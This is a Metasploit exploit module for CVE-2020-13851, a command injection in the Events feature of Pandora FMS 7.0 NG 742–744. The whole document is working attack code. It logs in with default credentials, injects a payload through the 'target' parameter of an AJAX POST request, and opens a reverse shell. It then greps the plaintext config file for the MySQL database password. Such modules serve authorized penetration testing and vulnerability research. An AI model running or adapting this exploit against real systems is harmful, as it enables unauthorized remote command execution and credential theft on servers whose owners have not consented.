Pandora FMS 7.0 NG 7XX Remote Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Pandora FMS Events Remote Command Execution',  
'Description' => %q{  
This module exploits a vulnerability (CVE-2020-13851) in Pandora  
FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps  
older versions) in order to execute arbitrary commands.  
  
This module takes advantage of a command injection vulnerability in the  
`Events` feature of Pandora FMS. This flaw allows users to execute  
arbitrary commands via the `target` parameter in HTTP POST requests to  
the `Events` function. After authenticating to the target, the module  
attempts to exploit this flaw by issuing such an HTTP POST request,  
with the `target` parameter set to contain the payload. If a shell is  
obtained, the module will try to obtain the local MySQL database  
password via a simple `grep` command on the plaintext  
`/var/www/html/pandora_console/include/config.php` file.  
  
Valid credentials for a Pandora FMS account are required. The account  
does not need to have admin privileges.  
This module has been successfully tested on Pandora 7.0 NG 744 running  
on CentOS 7 (the official virtual appliance ISO for this version).  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Fernando Catoira', # Discovery  
'Julio Sanchez', # Discovery  
'Erik Wynter' # @wyntererik - Metasploit  
],  
'References' =>  
[  
['CVE', '2020-13851'], # RCE via the `events` feature  
['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']  
],  
'Platform' => ['linux', 'unix'],  
'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],  
'Targets' =>  
[  
[  
'Linux (x86)', {  
'Arch' => ARCH_X86,  
'Platform' => 'linux',  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Linux (x64)', {  
'Arch' => ARCH_X64,  
'Platform' => 'linux',  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Linux (cmd)', {  
'Arch' => ARCH_CMD,  
'Platform' => 'unix',  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_bash'  
}  
}  
]  
],  
'Privileged' => false,  
'DisclosureDate' => '2020-06-04',  
'DefaultTarget' => 1  
)  
)  
register_options [  
OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),  
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),  
OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])  
]  
end  
  
def check  
vprint_status('Running check')  
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')  
  
unless res  
return CheckCode::Unknown('Connection failed.')  
end  
  
unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')  
return CheckCode::Safe('Target is not a Pandora FMS application.')  
end  
  
@cookie = res.get_cookies  
html = res.get_html_document  
full_version = html.at('div[@id="ver_num"]')  
  
if full_version.blank?  
return CheckCode::Detected('Could not determine the Pandora FMS version.')  
end  
  
full_version = full_version.text  
  
version = full_version[1..-1].sub('NG', '')  
  
if version.blank?  
return CheckCode::Detected('Could not determine the Pandora FMS version.')  
end  
  
version = Gem::Version.new version  
  
unless version <= Gem::Version.new('7.0.744')  
return CheckCode::Safe("Target is Pandora FMS version #{full_version}.")  
end  
  
CheckCode::Appears("Target is Pandora FMS version #{full_version}.")  
end  
  
def login(user, pass)  
vprint_status "Authenticating as #{user} ..."  
  
res = send_request_cgi!({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'index.php'),  
'cookie' => @cookie,  
'vars_get' => { 'login' => '1' },  
'vars_post' => {  
'nick' => user,  
'pass' => pass,  
'login_button' => 'Login'  
}  
})  
  
unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')  
fail_with Failure::NoAccess, 'Authentication failed'  
end  
  
print_good "Authenticated as user #{user}."  
end  
  
def on_new_session(client)  
super  
if target.arch.first == ARCH_CMD  
print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')  
client.shell_write("grep dbpass include/config.php\n")  
else  
print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.')  
end  
end  
  
def execute_command(cmd, _opts = {})  
print_status('Executing payload...')  
  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'ajax.php'),  
'cookie' => @cookie,  
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',  
'Referer' => full_uri('index.php'),  
'vars_get' => {  
'sec' => 'eventos',  
'sec2' => 'operation/events/events'  
},  
'vars_post' => {  
'page' => 'include/ajax/events',  
'perform_event_response' => '10000000',  
'target' => cmd.to_s,  
'response_id' => '1'  
}  
}, 0) # the server will not send a response, so the module shouldn't wait for one  
end  
  
def exploit  
login(datastore['USERNAME'], datastore['PASSWORD'])  
  
if target.arch.first == ARCH_CMD  
execute_command payload.encoded  
else  
execute_cmdstager(background: true)  
end  
end  
end  
`